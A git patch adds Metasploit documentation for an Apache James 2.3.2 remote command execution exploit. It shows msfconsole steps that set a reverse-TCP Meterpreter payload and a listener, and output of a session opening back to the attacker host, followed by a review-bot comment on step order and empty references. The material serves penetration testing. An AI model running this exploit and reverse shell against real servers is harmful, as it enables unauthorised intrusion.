From 195d699df04875b7dbf5aaf1e2d27fb9b3d287cd Mon Sep 17 00:00:00 2001 From: mattaberegg Date: Sat, 18 Jan 2020 19:06:59 -0800 Subject: [PATCH] Add module documentation. --- .../exploit/linux/smtp/apache_james_exec.md | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 documentation/modules/exploit/linux/smtp/apache_james_exec.md diff --git a/documentation/modules/exploit/linux/smtp/apache_james_exec.md b/documentation/modules/exploit/linux/smtp/apache_james_exec.md new file mode 100644 index 0000000000..0812b8d2cd --- /dev/null +++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md 
@@ -0,0 +1,77 @@ +## Vulnerable Application + This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here: + https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf + +## Verification Steps + 1. Load the module: +``` + msf5 > use exploit/linux/smtp/apache_james_exec +``` + + 2. Set remote and local options: +``` + msf5 exploit(linux/smtp/apache_james_exec) > set target 1 + target => 1 + msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 + rhosts => 192.168.224.164 + msf5 exploit(linux/smtp/apache_james_exec) > set rport 25 + rport => 25 + + msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 + lhost => 192.168.224.167 + msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444 + lport => 4444 +``` + + 3. Set payload: +``` + msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp +``` + + 4. Check version and run exploit: +``` + msf5 exploit(linux/smtp/apache_james_exec) > check + [*] 192.168.224.164:25 - The target appears to be vulnerable. + msf5 exploit(linux/smtp/apache_james_exec) > exploit + + [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes) +``` + + 5. 
Set up and run listener (Can be done before running exploit): +``` + msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler + msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp + msf5 exploit(multi/handler) > set lport 4444 + lport => 4444 + msf5 exploit(multi/handler) > set lhost 192.168.224.167 + lhost => 192.168.224.167 + + msf5 exploit(multi/handler) > run + + [*] Started reverse TCP handler on 192.168.224.167:4444 + [*] Sending stage (3021284 bytes) to 192.168.224.164 + [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800 + + meterpreter > +``` + +## Options + **USERNAME:** The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. + **PASSWORD:** The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. + **ADMINPORT:** The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. + **RHOSTS:** The IP address of the vulnerable server. + **RPORT:** The port number of the SMTP service. + +## Targets +``` + Id Name + -- ---- + 0 Linux x86 + 1 Linux x64 +``` + +## References + 1. + 2.
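Review bot: In Verification Steps, step 5 ("Set up and run listener (Can be done before running exploit)") comes after step 4 has already run `exploit`, so a reader who follows the steps in order has no handler waiting for the session. Move the listener setup ahead of the "Check version and run exploit" step and drop the parenthetical. The step 4 output shows only the "Command Stager progress" line, so it would also help to state that the session appears in the separate multi/handler. The References section at the end of the file contains only "1." and "2." with no entries. Fill these in, for example with the exploit-db document already linked under Vulnerable Application, or remove the section. The Options section documents USERNAME, PASSWORD and ADMINPORT, but the steps never mention them. One sentence saying the walkthrough relies on the defaults ('root', 'root', '4555') would make that explicit.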